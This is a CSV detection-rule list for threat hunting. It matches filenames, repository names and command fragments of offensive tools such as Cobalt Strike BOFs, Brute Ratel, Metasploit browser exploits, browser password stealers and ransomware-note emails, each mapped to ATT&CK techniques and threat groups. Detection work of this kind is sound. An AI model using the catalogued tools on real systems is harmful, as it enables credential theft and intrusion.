"*bpysecdump.exe*",".{0,1000}bpysecdump\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","36214"
"*brain.support@cyberfear.com*",".{0,1000}brain\.support\@cyberfear\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","36215"
"*brc4_ldap_sentinel.py*",".{0,1000}brc4_ldap_sentinel\.py.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","36218"
"*Brc4ConfigExtractor.exe*",".{0,1000}Brc4ConfigExtractor\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36219"
"*Brc4DecodeString*",".{0,1000}Brc4DecodeString.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36220"
"*breenmachine/RottenPotatoNG*",".{0,1000}breenmachine\/RottenPotatoNG.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","1","N/A","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","36222"
"*breg add *HK*",".{0,1000}breg\sadd\s.{0,1000}HK.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ausecwa/bof-registry","1","0","N/A","N/A","10","10","27","8","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z","36223"
"*breg delete *HK*",".{0,1000}breg\sdelete\s.{0,1000}HK.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ausecwa/bof-registry","1","0","N/A","N/A","10","10","27","8","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z","36224"
"*breg query *HK*",".{0,1000}breg\squery\s.{0,1000}HK.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ausecwa/bof-registry","1","0","N/A","N/A","10","10","27","8","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z","36225"
"*breg_add_string_value*",".{0,1000}breg_add_string_value.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ausecwa/bof-registry","1","1","N/A","N/A","10","10","27","8","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z","36226"
"*bremote_exec*",".{0,1000}bremote_exec.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","36227"
"*breviaries -Properties DnsHostName*ms-Mcs-AdmPwd*",".{0,1000}breviaries\s\-Properties\sDnsHostName.{0,1000}ms\-Mcs\-AdmPwd.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","36228"
"*brew install sniffer*",".{0,1000}brew\sinstall\ssniffer.{0,1000}","offensive_tool_keyword","sniffer","A modern alternative network traffic sniffer.","T1040 - T1052.001 - T1046 - T1552.002","TA0011 - TA0007 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/chenjiandongx/sniffer","1","0","N/A","N/A","N/A","8","769","67","2024-03-02T07:48:19Z","2021-11-08T15:36:03Z","36231"
"*Brex765ave-Broedx765wser\\Usedx765er Data*",".{0,1000}Brex765ave\-Broedx765wser\\\\Usedx765er\sData.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","36232"
"*BronzeTicket/SharpNBTScan*",".{0,1000}BronzeTicket\/SharpNBTScan.{0,1000}","offensive_tool_keyword","SharpNBTScan","a NetBIOS scanner. Ghost actors use this tool for hostname and IP address enumeration","T1018 - T1046","TA0007","Ghost Ransomware","N/A","Discovery","https://github.com/BronzeTicket/SharpNBTScan","1","1","N/A","N/A","7","1","71","4","2021-08-06T05:36:55Z","2021-07-12T08:57:39Z","36234"
"*bropper.py *",".{0,1000}bropper\.py\s.{0,1000}","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Hakumarachi/Bropper","1","0","N/A","N/A","7","3","201","19","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z","36235"
"*Bropper-main.zip*",".{0,1000}Bropper\-main\.zip.{0,1000}","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Hakumarachi/Bropper","1","1","N/A","N/A","7","3","201","19","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z","36236"
"*browser.keylog_file.write*",".{0,1000}browser\.keylog_file\.write.{0,1000}","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","0","N/A","N/A","10","5","487","51","2024-11-21T17:36:55Z","2023-08-02T14:30:41Z","36237"
"*browser_##*",".{0,1000}browser_\#\#.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","36239"
"*browser_autopwn*",".{0,1000}browser_autopwn.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","36240"
"*browser_autopwn*",".{0,1000}browser_autopwn.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","36241"
"*browser_autopwn2_spec.rb*",".{0,1000}browser_autopwn2_spec\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","36242"
"*browser_exploit.rb*",".{0,1000}browser_exploit\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","36243"
"*browser_exploit_server_spec.rb*",".{0,1000}browser_exploit_server_spec\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","36244"
"*BrowserBookmarkDiscovery_BrowserHistory.py*",".{0,1000}BrowserBookmarkDiscovery_BrowserHistory\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","36245"
"*Browser-C2.git*",".{0,1000}Browser\-C2\.git.{0,1000}","offensive_tool_keyword","Browser-C2","Post Exploitation agent which uses a browser to do C2 operations.","T1105  - T1102","TA0003 - TA0005 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/Browser-C2","1","1","N/A","N/A","10","10","102","28","2018-05-25T15:12:21Z","2018-05-22T14:33:24Z","36246"
"*Browser-C2-master.zip*",".{0,1000}Browser\-C2\-master\.zip.{0,1000}","offensive_tool_keyword","Browser-C2","Post Exploitation agent which uses a browser to do C2 operations.","T1105  - T1102","TA0003 - TA0005 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/Browser-C2","1","1","N/A","N/A","10","10","102","28","2018-05-25T15:12:21Z","2018-05-22T14:33:24Z","36247"
"*BrowserDataGrabber.exe*",".{0,1000}BrowserDataGrabber\.exe.{0,1000}","offensive_tool_keyword","Browser Data Grabber","credential access tool used by the Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://github.com/n37sn4k3/BrowserDataGrabber","1","1","N/A","N/A","10","1","7","4","2018-05-28T15:49:03Z","2018-05-04T12:33:32Z","36248"
"*BrowserDataGrabber-master.zip*",".{0,1000}BrowserDataGrabber\-master\.zip.{0,1000}","offensive_tool_keyword","Browser Data Grabber","credential access tool used by the Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://github.com/n37sn4k3/BrowserDataGrabber","1","1","N/A","N/A","10","1","7","4","2018-05-28T15:49:03Z","2018-05-04T12:33:32Z","36249"
"*browserexploitserver.rb*",".{0,1000}browserexploitserver\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","36250"
"*BrowserGhost.exe*",".{0,1000}BrowserGhost\.exe.{0,1000}","offensive_tool_keyword","BrowserGhost","This is a tool for grabbing browser passwords","T1555.003 - T1555.013 - T1003.008","TA0006","N/A","N/A","Credential Access","https://github.com/QAX-A-Team/BrowserGhost","1","1","N/A","N/A","10","10","1414","206","2022-05-21T14:09:45Z","2020-06-12T12:19:06Z","36251"
"*BrowserGhost-N*.exe*",".{0,1000}BrowserGhost\-N.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Black Basta","Framework","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","N/A","","N/A","","","","36252"
"*BrowserListener.py*",".{0,1000}BrowserListener\.py.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","N/A","10","4656","1722","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z","36253"
"*Browser-password-stealer.git*",".{0,1000}Browser\-password\-stealer\.git.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","1","N/A","N/A","10","5","423","62","2024-07-12T10:30:42Z","2020-09-15T09:23:56Z","36254"
"*Browser-password-stealer-master*",".{0,1000}Browser\-password\-stealer\-master.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","1","N/A","N/A","10","5","423","62","2024-07-12T10:30:42Z","2020-09-15T09:23:56Z","36255"
